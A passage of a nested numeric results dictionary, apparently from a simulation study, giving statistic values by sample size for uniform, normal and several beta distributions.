'beta4': 0.053576307903667963}, 300: {'uni': 0.07864177620663654, 'nor': 0.15022792976856758, 'beta1': 0.07821473255565609, 'beta2': 0.1478580791021359, 'beta4': 0.06262935931375649}, 200: {'uni': 0.0953862720353692, 'nor': 0.1622200125881057, 'beta1': 0.09603404932034854, 'beta2': 0.15816299759409325, 'beta4': 0.0773943582431677}, 150: {'uni': 0.11002583704405877, 'nor': 0.17113991351179697, 'beta1': 0.10936894301480282, 'beta2': 0.1687178421219161, 'beta4': 0.09028525692400177}, 100: {'uni': 0.13401450754618016, 'nor': 0.1895698802210114, 'beta1': 0.1344582332361554, 'beta2': 0.18419709322450312, 'beta4': 0.11379130616549382}, 75: {'uni': 0.15488258558714707, 'nor': 0.20362572995006806, 'beta1': 0.1539002041533405, 'beta2': 0.20128361931559535, 'beta4': 0.1333671945439988}, 50: {'uni': 0.18840791165484855, 'nor': 0.23257306685125415, 'beta1': 0.18867436580219135, 'beta2': 0.22835957658151024, 'beta4': 0.16757432345808926}, 30: {'uni': 0.24023168620563118, 'nor': 0.27904847253128273, 'beta1': 0.24006751123167158, 'beta2': 0.2727595659081496, 'beta4': 0.22275659673727644}, 20: {'uni': 0.2940018318983334, 'nor': 0.32479532584592363, 'beta1': 0.2929946618763485, 'beta2': 0.3206467179138732, 'beta4': 0.2753491673001646}, 10: {'uni': 0.4065488810708842, 'nor': 0.43093738566136636, 'beta1': 0.4064636440527985, 'beta2': 0.42567627450176926, 'beta4': 0.3935956418408144}}, 30: {1000: {'uni': 0.04968157954456354, 'nor': 0.1696151004367587, 'beta1': 0.04281863132067795, 'beta2': 0.14689302839678564, 'beta4': 0.03311442937738629}, 750: {'uni': 0.055574487451747534, 'nor': 0.17246364021137395, 'beta1': 0.04952430388104273, 'beta2': 0.15046099536657231, 'beta4': 0.038285428923678255}, 500: {'uni': 0.06478088254077552, 'nor': 0.1737409366264756, 'beta1': 0.0602313802132467, 'beta2': 0.15517477082552145, 'beta4': 0.047192612626946184}, 400: {'uni': 0.07143398822894637, 'nor': 0.1789456292964713, 'beta1': 0.06778902728856115, 'beta2': 0.15742066713207048, 'beta4': 
0.05282205994257394}, 300: {'uni': 0.08082785446492691, 'nor': 0.1824810151126436, 'beta1': 0.07787606767722169, 'beta2': 0.16276174102685503, 'beta4': 0.06159728641016676}, 200: {'uni': 0.0974108225516378, 'nor': 0.19235380984611056, 'beta1': 0.09543113477422605, 'beta2': 0.17283803046058355, 'beta4': 0.07550424392452293}, 150: {'uni': 0.11141405928139247, 'nor': 0.20191035833451154, 'beta1': 0.10938230867137078, 'beta2': 0.1820889616226289, 'beta4': 0.08762848356724207}, 100: {'uni': 0.13493046831910993, 'nor': 0.21701554067653117, 'beta1': 0.13386778798076912, 'beta2': 0.19508747959897582, 'beta4': 0.11093409043298663}, 75: {'uni': 0.15528958618348487, 'nor': 0.2299457189815397, 'beta1': 0.15409095027566755, 'beta2': 0.2109482892562924, 'beta4': 0.12881215324966622}, 50: {'uni': 0.18842291872138123, 'nor': 0.2584487077125532, 'beta1': 0.18890320722823578, 'beta2': 0.23827797918175672, 'beta4': 0.16158273294453834}, 30: {'uni': 0.2398366149463353, 'nor': 0.2980088771871361, 'beta1': 0.24200577319830247, 'beta2': 0.28238021073320035, 'beta4': 0.21498111468517844}, 20: {'uni': 0.29227132801590716, 'nor': 0.34432255002709555, 'beta1': 0.2914850392665248, 'beta2': 0.32585452654798963, 'beta4': 0.2669285712544458}, 10: {'uni': 0.40609305573179105, 'nor': 0.447820015199636, 'beta1': 0.40782948526995666, 'beta2': 0.42757111844224754, 'beta4': 0.3886693622267199}}, 20: {1000: {'uni': 0.05775001007007219, 'nor': 0.20319134519921084, 'beta1': 0.048129745899927925, 'beta2': 0.1658497799626829, 'beta4': 0.0329367295696176}, 750: {'uni': 0.062124231199756075, 'nor': 0.20860283378380778, 'beta1': 0.04983248111631, 'beta2': 0.16830562563830098, 'beta4': 0.03824865513096315}, 500: {'uni': 0.0705024643008979, 'nor': 0.21381602181117743, 'beta1': 0.06065658795610929, 'beta2': 0.17239927975361702, 'beta4': 0.04679865268868699}, 400: {'uni': 0.0761771420430718, 'nor': 0.21385203271203002, 'beta1': 0.06752239679804717, 'beta2': 0.17470111438116842, 'beta4': 0.05231551861903025}, 300: 
{'uni': 0.08596884925259118, 'nor': 0.21991598100008408, 'beta1': 0.07755871126605102, 'beta2': 0.179198373732674, 'beta4': 0.06068391139230339}, 200: {'uni': 0.10080581963801893, 'nor': 0.22897240194696655, 'beta1': 0.09573721958215525, 'beta2': 0.18553633863631513, 'beta4': 0.07462617121595846}, 150: {'uni': 0.114468804467043, 'nor': 0.23631664987390277, 'beta1': 0.10962036209737869, 'beta2': 0.1966018010006519, 'beta4': 0.0870041079920092}, 100: {'uni': 0.13665630970632198, 'nor': 0.2515883777222933, 'beta1': 0.1336228418007765, 'beta2': 0.20881550687413342, 'beta4': 0.10773682421715106}, 75: {'uni': 0.15695962977063316, 'nor': 0.2603016829084427, 'beta1': 0.15508110679604847, 'beta2': 0.22376688776132403, 'beta4': 0.125626481557148}, 50: {'uni': 0.18798876388799624, 'nor': 0.2849538127709019, 'beta1': 0.18882535166765735, 'beta2': 0.24974430328165448, 'beta4': 0.158008406145491}, 30: {'uni': 0.23998853919104884, 'nor': 0.3219977260938881, 'beta1': 0.24135680518002922, 'beta2': 0.2899857898675655, 'beta4': 0.20763359812674523}, 20: {'uni': 0.292373057732106, 'nor': 0.3655787731698917, 'beta1': 0.2924979299262157, 'beta2': 0.3319078417717419, 'beta4': 0.2608606590647614}, 10: {'uni': 0.4061016266543868, 'nor': 0.4671521171088977, 'beta1': 0.4096525764106935, 'beta2': 0.4345673196704135, 'beta4': 0.37937846970295347}}, 10: {1000: {'uni': 0.0913473264369822, 'nor': 0.2964728394162681, 'beta1': 0.09100152658005456, 'beta2': 0.20242925737599682, 'beta4': 0.032700600789628664}, 750: {'uni': 0.09326085272482565, 'nor': 0.29554795490186203, 'beta1': 0.09103352579316204, 'beta2': 0.20619044529626096, 'beta4': 0.037829259115970404}, 500: {'uni': 0.0971331647876415, 'nor': 0.30097993907808684, 'beta1': 0.091049904849404, 'beta2': 0.20699779845573962, 'beta4': 0.04650399550454862}, 400: {'uni': 0.1003597113284248, 'nor': 0.30233932585089107, 'beta1': 0.09107096529100855, 'beta2': 0.20830655812948695, 'beta4': 0.051895391977686056}, 300: {'uni': 0.10721764330695623, 'nor': 
0.3073271090395088, 'beta1': 0.09112836953131596, 'beta2': 0.21402715597956734, 'beta4': 0.06001640083268511}, 200: {'uni': 0.11805616667496477, 'nor': 0.3147831503605935, 'beta1': 0.09648796317997815, 'beta2': 0.22109533500255907, 'beta4': 0.07370742701518179}, 150: {'uni': 0.12810610943312417, 'nor': 0.32062575553585454, 'beta1': 0.1103702654857096, 'beta2': 0.22691351867751697, 'beta4': 0.08545929847308015}, 100: {'uni': 0.14756617194854993, 'nor': 0.33197543815379127, 'beta1': 0.135132358543155, 'beta2': 0.23880036275598282, 'beta4': 0.1050005710193368}, 75: {'uni': 0.1661626166131514, 'nor': 0.34126609250236845, 'beta1': 0.15438638517404316, 'beta2': 0.2499089973779972, 'beta4': 0.12149147312793035}, 50: {'uni': 0.19583204530592255, 'nor': 0.3545594670011578, 'beta1': 0.18672230934909217, 'beta2': 0.2730457458179122, 'beta4': 0.1512119547385279}, 30: {'uni': 0.2435600610386478, 'nor': 0.39653189875476424, 'beta1': 0.2404639573254724, 'beta2': 0.3066180700113161, 'beta4': 0.19739374662116618}, 20: {'uni': 0.2932263659568272, 'nor': 0.4283833265615067, 'beta1': 0.29077513214843564, 'beta2': 0.3504847489217736, 'beta4': 0.24789858189847203}, 10: {'uni': 0.4059510050471383, 'nor': 0.51847323520602, 'beta1': 0.40531924075862663, 'beta2': 0.442169996022317, 'beta4': 0.3597039082336214}}}, 0.1: {1000: {1000: {'uni': 0.03865579099473948, 'nor': 0.04689323213481217, 'beta1': 0.03864443104847837, 'beta2': 0.06928001273732087, 'beta4': 0.034746385826709525}, 750: {'uni': 0.04431178998702129, 'nor': 0.05154757047623354, 'beta1': 0.04471651202934612, 'beta2': 0.07068001177091865, 'beta4': 0.04061642187839365}, 500: {'uni': 0.05449621343988875, 'nor': 0.06052185385730591, 'beta1': 0.054284378799021704, 'beta2': 0.07627185785494306, 'beta4': 0.05066709479143283}, 400: {'uni': 0.06094293297893738, 'nor': 0.06655379885026683, 'beta1': 0.06063207438253193, 'beta2': 0.0805230789692084, 'beta4': 0.057268551423413916}, 300: {'uni': 0.07035612682535114, 'nor': 0.07484946592814268, 
'beta1': 0.07012629576924828, 'beta2': 0.08695683101854024, 'beta4': 0.06723411467423446}, 200: {'uni': 0.0856850266615582, 'nor': 0.08920392339205196, 'beta1': 0.08598961798425064, 'beta2': 0.09957077044100182, 'beta4': 0.0828676651996616}, 150: {'uni': 0.09851344951124391, 'nor': 0.10245978909640735, 'beta1': 0.09874089203017197, 'beta2': 0.11143243172461781, 'beta4': 0.09626599766980459}, 100: {'uni': 0.1210111549309712, 'nor': 0.12298171658155477, 'beta1': 0.12043414875564495, 'beta2': 0.1308096653595, 'beta4': 0.11838570937570658}, 75: {'uni': 0.13938671579559747, 'nor': 0.14217000359022663, 'beta1': 0.138725193479173, 'beta2': 0.1471890814905698, 'beta4': 0.1371285598122392}, 50: {'uni': 0.16966268801360024, 'nor': 0.17032733000500144, 'beta1': 0.16965634639647975, 'beta2': 0.17659318599354473, 'beta4': 0.16779361043827323}, 30: {'uni': 0.21937716053448017, 'nor': 0.2191535761895615, 'beta1': 0.21730939148151623, 'beta2': 0.22312364454880895, 'beta4': 0.21786573953931154}, 20: {'uni': 0.26624534959584256, 'nor': 0.2653268175644278, 'beta1': 0.26474433641392037, 'beta2': 0.26812009306025597, 'beta4': 0.26194067601195037}, 10: {'uni': 0.36801398201907515, 'nor': 0.3709069141739802, 'beta1': 0.3668592370274731, 'beta2': 0.37064040545123844, 'beta4': 0.36704323242150666}}, 750: {1000: {'uni': 0.038578042981164296, 'nor': 0.048914303251900604, 'beta1': 0.03853302192863617, 'beta2': 0.0688056514749229, 'beta4': 0.0338622699562493}, 750: {'uni': 0.04442141557686974, 'nor': 0.05374944654503383, 'beta1': 0.044374748815966814, 'beta2': 0.07026684762315227, 'beta4': 0.03979048728222595}, 500: {'uni': 0.054286956718598955, 'nor': 0.06212763227553719, 'beta1': 0.054253588244283946, 'beta2': 0.07656236068086564, 'beta4': 0.049939942721689445}, 400: {'uni': 0.06083366825985448, 'nor': 0.06788419585350336, 'beta1': 0.060660028681503775, 'beta2': 0.08068669745769219, 'beta4': 0.05675736877098636}, 300: {'uni': 0.06993166265169576, 'nor': 0.07680384961751496, 'beta1': 
0.07010161417489508, 'beta2': 0.0880572291137307, 'beta4': 0.06596363343773998}, 200: {'uni': 0.0851211251657536, 'nor': 0.09099559217968667, 'beta1': 0.08536971610728128, 'beta2': 0.10062359974481189, 'beta4': 0.08250279408907268}, 150: {'uni': 0.09831231905867402, 'nor': 0.10383736756173939, 'beta1': 0.09899967339806359, 'beta2': 0.11139402129433418, 'beta4': 0.09586157739072232}, 100: {'uni': 0.12095357943723123, 'nor': 0.12436567324838821, 'beta1': 0.12052591808871516, 'beta2': 0.13100845891806429, 'beta4': 0.11773670273834078}, 75: {'uni': 0.13940484887133242, 'nor': 0.14155145908354727, 'beta1': 0.13837916177477272, 'beta2': 0.14796493865747803, 'beta4': 0.13654473331430828}, 50: {'uni': 0.16894951238844866, 'nor': 0.17265459646884784, 'beta1': 0.16961105932607348, 'beta2': 0.17656490288692311, 'beta4': 0.1674972244617925}, 30: {'uni': 0.21651765294813125, 'nor': 0.21939168771962442, 'beta1': 0.21729204037445293, 'beta2': 0.22349957660235154, 'beta4': 0.21623428560039515}, 20: {'uni': 0.2642786935555307, 'nor': 0.2675799785148938, 'beta1': 0.26561099996019183, 'beta2': 0.2691253631613714, 'beta4': 0.2645344136768742}, 10: {'uni': 0.3695291099836718, 'nor': 0.3711051681589676, 'beta1': 0.37110270903505804, 'beta2': 0.3730098056299037, 'beta4': 0.3662152768074211}}, 500: {1000: {'uni': 0.03836341807194299, 'nor': 0.05288441357758422, 'beta1': 0.03855355377252884, 'beta2': 0.07246101460269183, 'beta4': 0.03331891444897561}, 750: {'uni': 0.0444146556451972, 'nor': 0.05765382477238595, 'beta1': 0.04441014342661165, 'beta2': 0.07465473765203068, 'beta4': 0.03861388373348723}, 500: {'uni': 0.05438833618427541, 'nor': 0.06550856448266529, 'beta1': 0.05429312306612194, 'beta2': 0.08110283704211807, 'beta4': 0.048644471904955966}, 400: {'uni': 0.06077670141165842, 'nor': 0.07181845544231241, 'beta1': 0.06061997617710235, 'beta2': 0.08578519852772415, 'beta4': 0.05521030797490445}, 300: {'uni': 0.07041595748509133, 'nor': 0.07946505900730128, 'beta1': 
0.0704016017009636, 'beta2': 0.09209979263017587, 'beta4': 0.06483174788141038}, 200: {'uni': 0.08563012945992199, 'nor': 0.0940723299141569, 'beta1': 0.08541074081441047, 'beta2': 0.10458447320510883, 'beta4': 0.08098282824897673}, 150: {'uni': 0.09899026948327977, 'nor': 0.10562357103466236, 'beta1': 0.09861292652287168, 'beta2': 0.11632528204922898, 'beta4': 0.0940489883300496}, 100: {'uni': 0.12076176494614121, 'nor': 0.1257258205330381, 'beta1': 0.12054780424559441, 'beta2': 0.13468669896864294, 'beta4': 0.11652043544137913}, 75: {'uni': 0.13920364976539873, 'nor': 0.1451998235260331, 'beta1': 0.13872567771909045, 'beta2': 0.15128300093267993, 'beta4': 0.13571279744636144}, 50: {'uni': 0.16954390111422946, 'nor': 0.172692463113301, 'beta1': 0.1693168682908624, 'beta2': 0.17976834049282708, 'beta4': 0.16609850304544527}, 30: {'uni': 0.21709640413871756, 'nor': 0.22184138531054348, 'beta1': 0.21757402187586894, 'beta2': 0.22444521991819788, 'beta4': 0.21392411551684015}, 20: {'uni': 0.2636520645162054, 'nor': 0.26652594436945887, 'beta1': 0.265223822071589, 'beta2': 0.2721218328512449, 'beta4': 0.2627686738338032}, 10: {'uni': 0.36726905749678107, 'nor': 0.3699346949326602, 'beta1': 0.36849489074859143, 'beta2': 0.3705089961045096, 'beta4': 0.3683244510638542}}, 400: {1000: {'uni': 0.038671955406556435, 'nor': 0.055340672020988524, 'beta1': 0.03839858850395489, 'beta2': 0.07292338725212977, 'beta4': 0.032563312918836074}, 750: {'uni': 0.04481109074042289, 'nor': 0.05989416561151395, 'beta1': 0.04447627902390899, 'beta2': 0.07495569974438154, 'beta4': 0.03825050788799533}, 500: {'uni': 0.05452739978724558, 'nor': 0.06844117462965149, 'beta1': 0.05427711866364415, 'beta2': 0.08075667657637409, 'beta4': 0.04799001758839683}, 400: {'uni': 0.0611511660781307, 'nor': 0.07331590982555752, 'beta1': 0.060592106128168455, 'beta2': 0.08541781550168484, 'beta4': 0.05429207860179752}, 300: {'uni': 0.07033185789840113, 'nor': 0.08155939051842442, 'beta1': 0.07020664995088899, 
'beta2': 0.09207127639350217, 'beta4': 0.06368267547644724}, 200: {'uni': 0.08544638993146081, 'nor': 0.09571715041830708, 'beta1': 0.08570866106209285, 'beta2': 0.10630400769293069, 'beta4': 0.08024458505578957}, 150: {'uni': 0.09829333569563875, 'nor': 0.10653764892501733, 'beta1': 0.09928267092865872, 'beta2': 0.11707715788245693, 'beta4': 0.09396885720717318}, 100: {'uni': 0.12080421136273911, 'nor': 0.12821500349277992, 'beta1': 0.12103112779938607, 'beta2': 0.13533651452822992, 'beta4': 0.11606955631404037}, 75: {'uni': 0.13856046617279955, 'nor': 0.1448041375046114, 'beta1': 0.13960085219794205, 'beta2': 0.152159478857264, 'beta4': 0.13494084962417124}, 50: {'uni': 0.1693496286995576, 'nor': 0.17474469922632208, 'beta1': 0.16895412831719117, 'beta2': 0.17830731451150195, 'beta4': 0.1659480783288083}, 30: {'uni': 0.21819978784843835, 'nor': 0.2231518999196621, 'beta1': 0.21831546700467166, 'beta2': 0.2266742699981823, 'beta4': 0.21494937232251626}, 20: {'uni': 0.2667842124402274, 'nor': 0.2684191444539494, 'beta1': 0.2645995976816778, 'beta2': 0.27338561154866864, 'beta4': 0.26360661161857973}, 10: {'uni': 0.3669373614601618, 'nor': 0.37176690566406345, 'beta1': 0.3677474444699915, 'beta2': 0.3747266621010322, 'beta4': 0.3684049267602626}}, 300: {1000: {'uni': 0.038568146042191165, 'nor': 0.06033077287311639, 'beta1': 0.03858815015821093, 'beta2': 0.07552788266669708, 'beta4': 0.032200314601627644}, 750: {'uni': 0.04470027622900535, 'nor': 0.06449447691372501, 'beta1': 0.04445980130759988, 'beta2': 0.07824363987830985, 'beta4': 0.037629338463132156}, 500: {'uni': 0.05445235908316243, 'nor': 0.07219718892016075, 'beta1': 0.054262938865397015, 'beta2': 0.08422237701364471, 'beta4': 0.047142226840530044}, 400: {'uni': 0.06066467596958125, 'nor': 0.07755227668883014, 'beta1': 0.060492785543729444, 'beta2': 0.08820282905569876, 'beta4': 0.0537567311081823}, 300: {'uni': 0.06977557375995519, 'nor': 0.08485533637785325, 'beta1': 0.06951934425266007, 'beta2': 
0.09812061998557053, 'beta4': 0.06253013614048619}, 200: {'uni': 0.085560824769008, 'nor': 0.09806835521037083, 'beta1': 0.08569790505589447, 'beta2': 0.10952789442497846, 'beta4': 0.07876260453935757}, 150: {'uni': 0.09861884343747088, 'nor': 0.10976436498857722, 'beta1': 0.09868041617950538, 'beta2': 0.11941996964693702, 'beta4': 0.09215823777804794}, 100: {'uni': 0.12082163981848504, 'nor': 0.12942192768323635, 'beta1': 0.12068117757143665, 'beta2': 0.1385783464518442, 'beta4': 0.11497977710795462}, 75: {'uni': 0.1387394671775295, 'nor': 0.14749930743714523, 'beta1': 0.13839845771793613, 'beta2': 0.15556474644945018, 'beta4': 0.13341435974554122}, 50: {'uni': 0.1697760858230185, 'nor': 0.17696687496485167, 'beta1': 0.17005727177394436, 'beta2': 0.18213762748458961, 'beta4': 0.16456011116133662}, 30: {'uni': 0.21841433839440783, 'nor': 0.22294642276220844, 'beta1': 0.21767910026340637, 'beta2': 0.2267095097296688, 'beta4': 0.21367190022853494}, 20: {'uni': 0.26434835889323316, 'nor': 0.2703508019917835, 'beta1': 0.2657962071894101, 'beta2': 0.27291680141430064, 'beta4': 0.2608999363528367}, 10: {'uni': 0.366851595427454, 'nor': 0.3698626345274391, 'beta1': 0.3671514175821456, 'beta2': 0.3737902254897134, 'beta4': 0.36667318670050814}}, 200: {1000: {'uni': 0.03854748922549689, 'nor': 0.06826609819066709, 'beta1': 0.038509650033551, 'beta2': 0.08137799639220133, 'beta4': 0.03162300254061415}, 750: {'uni': 0.04473955552343811, 'nor': 0.07200790785222766, 'beta1': 0.04438496783157364, 'beta2': 0.08407305489878691, 'beta4': 0.03667915924788884}, 500: {'uni': 0.054603748253756024, 'nor': 0.07895892719006692, 'beta1': 0.05455329073640525, 'beta2': 0.09050017429835211, 'beta4': 0.0460887620966024}, 400: {'uni': 0.06068150539987971, 'nor': 0.08357529343486114, 'beta1': 0.0607004483760466, 'beta2': 0.09547446895325118, 'beta4': 0.052385584132791485}, 300: {'uni': 0.06982758157167712, 'nor': 0.0910022478908723, 'beta1': 0.06999218391151302, 'beta2': 0.10311006289652225, 
'beta4': 0.06142711299550374}, 200: {'uni': 0.0850781158120894, 'nor': 0.10365599068508824, 'beta1': 0.08590109771629173, 'beta2': 0.1149287508099453, 'beta4': 0.0770323488052646}, 150: {'uni': 0.0993944312574237, 'nor': 0.11435325767762983, 'beta1': 0.09924451816247526, 'beta2': 0.12522181631529639, 'beta4': 0.09022268035640774}, 100: {'uni': 0.1200373195770541, 'nor': 0.1336212549639687, 'beta1': 0.12101160493161028, 'beta2': 0.14360115025497422, 'beta4': 0.11282854715360996}, 75: {'uni': 0.13803069827511782, 'nor': 0.15135686336876558, 'beta1': 0.13969975342935437, 'beta2': 0.1581734543425124, 'beta4': 0.1311769883842281}, 50: {'uni': 0.17000076548600052, 'nor': 0.18005695698050672, 'beta1': 0.16957807122266255, 'beta2': 0.18526189089470024, 'beta4': 0.1623745159068773}, 30: {'uni': 0.2185664583080269, 'nor': 0.22568866441722213, 'beta1': 0.21591449849525435, 'beta2': 0.23093983759970643, 'beta4': 0.213118806872053}, 20: {'uni': 0.26291321552377933, 'nor': 0.27125311697510335, 'beta1': 0.265078403464129, 'beta2': 0.2748140209145749, 'beta4': 0.25847640298998725}, 10: {'uni': 0.3701815312790644, 'nor': 0.3735972474840512, 'beta1': 0.36772406840807353, 'beta2': 0.37422364182301204, 'beta4': 0.36496493955486975}}, 150: {1000: {'uni': 0.038671137731641714, 'nor': 0.07489217671007431, 'beta1': 0.038714599773274294, 'beta2': 0.08587393355161688, 'beta4': 0.031043016499080256}, 750: {'uni': 0.04433800928987097, 'nor': 0.07869757447476963, 'beta1': 0.04435075697917096, 'beta2': 0.0888959352720804, 'beta4': 0.0363140391204399}, 500: {'uni': 0.05430754404756716, 'nor': 0.08479608059147858, 'beta1': 0.05449721924927653, 'beta2': 0.09800285567074296, 'beta4': 0.04543347855755667}, 400: {'uni': 0.060705891345482654, 'nor': 0.08917510453779187, 'beta1': 0.060434538413570604, 'beta2': 0.10037917578431343, 'beta4': 0.051204096787690445}, 300: {'uni': 0.07049246163826528, 'nor': 0.09606124979171526, 'beta1': 0.07009292436806885, 'beta2': 0.1069080677782065, 'beta4': 
0.05999502715904392}, 200: {'uni': 0.08586052698148705, 'nor': 0.10900056975883626, 'beta1': 0.08626264567064978, 'beta2': 0.11987083383282779, 'beta4': 0.07554909088250805}, 150: {'uni': 0.09875402367188635, 'nor': 0.11962698211682443, 'beta1': 0.09823214833546662, 'beta2': 0.12903038650506438, 'beta4': 0.08871159962248731}, 100: {'uni': 0.12052514898174571, 'nor': 0.13889683791136048, 'beta1': 0.12060529630888162, 'beta2': 0.14704712969881378, 'beta4': 0.11045343255041773}, 75: {'uni': 0.1384992792451861, 'nor': 0.15478420535093318, 'beta1': 0.13894749406062784, 'beta2': 0.1622177087017118, 'beta4': 0.12957103132509315}, 50: {'uni': 0.1696445420380115, 'nor': 0.1826703268000962, 'beta1': 0.16956250951500046, 'beta2': 0.18912522574118165, 'beta4': 0.16076304630746918}, 30: {'uni': 0.21708843420467044, 'nor': 0.22747076876879424, 'beta1': 0.2162197472621421, 'beta2': 0.23011438026305547, 'beta4': 0.21038257831299034}, 20: {'uni': 0.2635940728771885, 'nor': 0.27181622559884444, 'beta1': 0.2656550529386193, 'beta2': 0.27590232647329493, 'beta4': 0.2610592031194704}, 10: {'uni': 0.36957283113407985, 'nor': 0.3755749715318515, 'beta1': 0.3694332288882942, 'beta2': 0.3745828156724571, 'beta4': 0.362866754497916}}, 100: {1000: {'uni': 0.0391852789896201, 'nor': 0.08748278815593058, 'beta1': 0.03835204486107713, 'beta2': 0.09059314017831821, 'beta4': 0.030871329427173577}, 750: {'uni': 0.04487620054963998, 'nor': 0.09008413022094708, 'beta1': 0.044419301053983895, 'beta2': 0.0938143285125057, 'beta4': 0.035651375677830055}, 500: {'uni': 0.05445853301054582, 'nor': 0.09612181255635743, 'beta1': 0.05460984209093778, 'beta2': 0.10218771914762725, 'beta4': 0.04452799083539005}, 400: {'uni': 0.060889521772825805, 'nor': 0.10031899779947095, 'beta1': 0.060948683104371126, 'beta2': 0.10541070962786026, 'beta4': 0.05012038630616317}, 300: {'uni': 0.07005128941367278, 'nor': 0.10658935036183773, 'beta1': 0.07009895459384657, 'beta2': 0.11170488328681916, 'beta4': 
0.05864521177984011}, 200: {'uni': 0.08540225344537783, 'nor': 0.11890199866834528, 'beta1': 0.08502320710520805, 'beta2': 0.12395353434803436, 'beta4': 0.07387574145690157}, 150: {'uni': 0.09885046476067078, 'nor': 0.12839494402381713, 'beta1': 0.09934985587864284, 'beta2': 0.13434579187022588, 'beta4': 0.08566408819803323}, 100: {'uni': 0.12047137314751694, 'nor': 0.14581363150714843, 'beta1': 0.12030434397784306, 'beta2': 0.1511774251514193, 'beta4': 0.10729772293868556}, 75: {'uni': 0.13900232220953807, 'nor': 0.16310365822781592, 'beta1': 0.13886677230092376, 'beta2': 0.16609733213725825, 'beta4': 0.12653611564166728}, 50: {'uni': 0.16926530053780198, 'nor': 0.1894194492417549, 'beta1': 0.1702780520534074, 'beta2': 0.19236637904828646, 'beta4': 0.1577775823414037}, 30: {'uni': 0.21805620163425476, 'nor': 0.23303141581452969, 'beta1': 0.21774239331391093, 'beta2': 0.23521808252559517, 'beta4': 0.20825701308967687}, 20: {'uni': 0.2643242332020047, 'nor': 0.27896279120794987, 'beta1': 0.2652844445947362, 'beta2': 0.27899677620691904, 'beta4': 0.2564356340644192}, 10: {'uni': 0.36868660537699743, 'nor': 0.3801425407117649, 'beta1': 0.3691995028759322, 'beta2': 0.37929775988096986, 'beta4': 0.3638553742502826}}, 75: {1000: {'uni': 0.03947518275469575, 'nor': 0.0972287182231617, 'beta1': 0.03864849717150598, 'beta2': 0.0952234254591443, 'beta4': 0.030504505239134838}, 750: {'uni': 0.04551965251101908, 'nor': 0.10116693467733584, 'beta1': 0.04443711038356635, 'beta2': 0.09869508499069957, 'beta4': 0.03555977512406705}, 500: {'uni': 0.05494057158528598, 'nor': 0.1057676067326096, 'beta1': 0.05445336207397927, 'beta2': 0.1055765017477942, 'beta4': 0.043998042119070546}, 400: {'uni': 0.060969026310390834, 'nor': 0.10945271980173626, 'beta1': 0.061077517258748326, 'beta2': 0.1099056389579467, 'beta4': 0.04942638750338929}, 300: {'uni': 0.07012941993226982, 'nor': 0.11595846348507075, 'beta1': 0.07039222027455194, 'beta2': 0.11738385669726281, 'beta4': 0.057678877694784}, 
200: {'uni': 0.08638646649234194, 'nor': 0.126890208298988, 'beta1': 0.08609870986026835, 'beta2': 0.1293273654437882, 'beta4': 0.07214722508101312}, 150: {'uni': 0.09903143295834599, 'nor': 0.13569255431524507, 'beta1': 0.0986204644618468, 'beta2': 0.1383759438633969, 'beta4': 0.08472012631786002}, 100: {'uni': 0.12042784597491996, 'nor': 0.1538654219813379, 'beta1': 0.12047443267408167, 'beta2': 0.15479064845781504, 'beta4': 0.10572696956038574}, 75: {'uni': 0.13830413084922855, 'nor': 0.16929639027614796, 'beta1': 0.1387890089056115, 'beta2': 0.16973078116853618, 'beta4': 0.12418040490595178}, 50: {'uni': 0.16830423148890084, 'nor': 0.1942891319284309, 'beta1': 0.16984574641040717, 'beta2': 0.19571354576291627, 'beta4': 0.15658953127105207}, 30: {'uni': 0.21781307361797006, 'nor': 0.23824445270348382, 'beta1': 0.21900666049148654, 'beta2': 0.23923389502771286, 'beta4': 0.20443259848465625}, 20: {'uni': 0.2619095049476788, 'nor': 0.2830118442439754, 'beta1': 0.26563000767153383, 'beta2': 0.281971996905995, 'beta4': 0.25388919785330466}, 10: {'uni': 0.3685724124734001, 'nor': 0.38033611275896406, 'beta1': 0.3703883643155905, 'beta2': 0.3794242112561502, 'beta4': 0.3585528364829571}}, 50: {1000: {'uni': 0.04077866659121632, 'nor': 0.11580496049799294, 'beta1': 0.03853944253374597, 'beta2': 0.10586786875499299, 'beta4': 0.03023595571004084}, 750: {'uni': 0.04664929426958103, 'nor': 0.11784347998818245, 'beta1': 0.04458588264014807, 'beta2': 0.10969638470331955, 'beta4': 0.03498175243961467}, 500: {'uni': 0.05599120254346879, 'nor': 0.1227826762822789, 'beta1': 0.05467291714710451, 'beta2': 0.11556286804274307, 'beta4': 0.04331548807386715}, 400: {'uni': 0.0618059390475908, 'nor': 0.12716067908984624, 'beta1': 0.06076018571852698, 'beta2': 0.11944923182949141, 'beta4': 0.048733808094156394}, 300: {'uni': 0.07145474332507373, 'nor': 0.13215808532037732, 'beta1': 0.07005566740115332, 'beta2': 0.12493758821402545, 'beta4': 0.05655427961943388}, 200: {'uni': 
0.08649126875588486, 'nor': 0.14398532562620858, 'beta1': 0.08564125071746342, 'beta2': 0.13571236054952152, 'beta4': 0.07038554117278428}, 150: {'uni': 0.09972216582225901, 'nor': 0.15081713302440228, 'beta1': 0.0980320332573475, 'beta2': 0.14532447093659528, 'beta4': 0.08274587331420269}, 100: {'uni': 0.12039381304129049, 'nor': 0.16746812959278995, 'beta1': 0.12027519702689837, 'beta2': 0.16277345040644908, 'beta4': 0.10360078281945007}, 75: {'uni': 0.13935366553924022, 'nor': 0.18277769750800105, 'beta1': 0.13931147415294898, 'beta2': 0.17557555907632716, 'beta4': 0.120496470943599}, 50: {'uni': 0.17045968935190703, 'nor': 0.2061624163310195, 'beta1': 0.16850089401261617, 'beta2': 0.20076750567324442, 'beta4': 0.1524439268490353}, 30: {'uni': 0.21706058239993287, 'nor': 0.24724662889782345, 'beta1': 0.21628695050401275, 'beta2': 0.2432570996508593, 'beta4': 0.2007074069679156}, 20: {'uni': 0.2644244349370678, 'nor': 0.2888841367890824, 'beta1': 0.2655430776294785, 'beta2': 0.2844954992477471, 'beta4': 0.24845905058828244}, 10: {'uni': 0.3691891891585487, 'nor': 0.38713991936611614, 'beta1': 0.36692723160862345, 'beta2': 0.38140488493099745, 'beta4': 0.3576454464109796}}, 30: {1000: {'uni': 0.045457677191963586, 'nor': 0.1457355582484376, 'beta1': 0.038546756955813, 'beta2': 0.1200679160771897, 'beta4': 0.030100677632104778}, 750: {'uni': 0.04995866353212569, 'nor': 0.14761791285414627, 'beta1': 0.044554754363745674, 'beta2': 0.12224473120434098, 'beta4': 0.03495775636349063}, 500: {'uni': 0.05880880623556495, 'nor': 0.15281360983908227, 'beta1': 0.05437068025855424, 'beta2': 0.12753056289514525, 'beta4': 0.0428449240771841}, 400: {'uni': 0.0645126168303099, 'nor': 0.15525355878197838, 'beta1': 0.061035794772328456, 'beta2': 0.1318918900818361, 'beta4': 